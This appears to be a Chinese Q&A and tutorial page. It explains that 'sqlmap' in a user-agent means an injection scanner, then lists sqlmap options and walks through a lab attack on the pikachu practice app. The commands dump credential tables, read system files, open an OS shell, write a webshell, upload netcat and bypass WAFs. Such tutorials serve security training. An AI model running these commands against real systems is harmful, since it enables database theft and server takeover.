user-agent里面的sqlmap是啥意思

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了user-agent里面的sqlmap是啥意思相关的知识,希望对你有一定的参考价值。

参考技术A sqlmap是一款黑客的 注入工具。估计有人扫,或是 在进行安全检测。

9sqlmap工具使用简介

一、sqlmap工具命令

-r 指定参数post注入 sqlmap.py -r post.txt -p 注入参数

-u get注入,后面直接接一个url连接

--level = LEVEL 执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。

--risk = RISK 执行测试的风险(0-3,默认为1),默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试。

-v ERBOSE信息级别: 0-6 (缺省1),其值具体含义:“0”只显示python错误以及严重的信息;1同时显示基本信息和警告信息(默认);“2”同时显示debug信息;“3”同时显示注入的payload;“4”同时显示HTTP请求;“5”同时显示HTTP响应头;“6”同时显示HTTP响应页面;如果想看到sqlmap发送的测试payload最好的等级就是3。

-p -p 后面接参数,针对单个参数注入

-threads 线程数,如果你想让sqlmap跑的更快,可以更改这个线程 数的值,默认值为10

-batch-smart 智能判断测试

--mobile 模拟测试手机环境站点

-m 批量注入

注入获取命令: --dbs //默认情况系sqlmap会自动的探测web应用后端的数据库类型:MySQL、Oracle、PostgreSQL、MicrosoftSQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAPMaxDB、DB2
--current-user:大多数数据库中可检测到数据库管理系统当前用户
--current-db:当前连接数据库名
--is-dba:判断当前的用户是否为管理
--users:列出数据库所有用户

获取表名 --tables -D 数据库名

字段名 --columns -T user -D abc

数据内容 -T user -C username,password,email --dump

读文件内容 --file-read /etc/password

系统交互的shell --os-shell

写webshell --file-write "c:/2.txt” --file-dest “C:/php/htdocs/sql.php” -v1 /将/software/nc.exe文件上传到C:/WINDOWS/Temp下/

sqlmap过waf --tamper ""

二、实验案例

实验环境使用 pikachu ,确定网站存在post漏洞,在网站上输入“1”,使用burp suite抓取数据包,把数据包放到D盘下,命名 1.txt。

1、查询可以利用的漏洞

sqlmap.py -r d:\\1.txt

image-20210530190724615

红框中的内容为sqlmap从存储的会话中恢复的注入点,并分别描述了type(注入类型),title和payload。

2、获取数据库管理系统当前用户

sqlmap.py -r d:\\1.txt --current-user

image-20210530191729170

3、获取当前连接数据库名

sqlmap.py -r d:\\1.txt --current-db

image-20210530192002814

4、判断当前用户是否为管理员用户

sqlmap.py -r d:\\1.txt --is-dba

image-20210530192347445

5、列出数据库所有用户

qlmap.py -r d:\\1.txt --users

image-20210530192551151

6、获取表名

sqlmap.py -r d:\\1.txt --tables -D pikachu

image-20210530192848583

7、获取字段名

sqlmap.py -r d:\\1.txt --columns -T users -D pikachu

image-20210530194721718

八、获取数据内容

sqlmap.py -r d:\\1.txt --dump -T users -C username,password,id,level

image-20210530195200903

以上是关于user-agent里面的sqlmap是啥意思的主要内容,如果未能解决你的问题,请参考以下文章

SQLmap参数设置之二——1.sqlmap设置user-agent;2.sqlmap设置host头;3.sqlmap设置referer头;4.sqlmap设置其他的HTTP头

SQLmap参数设置之二——1.sqlmap设置user-agent;2.sqlmap设置host头;3.sqlmap设置referer头;4.sqlmap设置其他的HTTP头

在sqlmap中tamper=space2comment是啥意思

9sqlmap工具使用简介

手机UC浏览器里User-Agent是啥意思啊!

C#using()是啥意思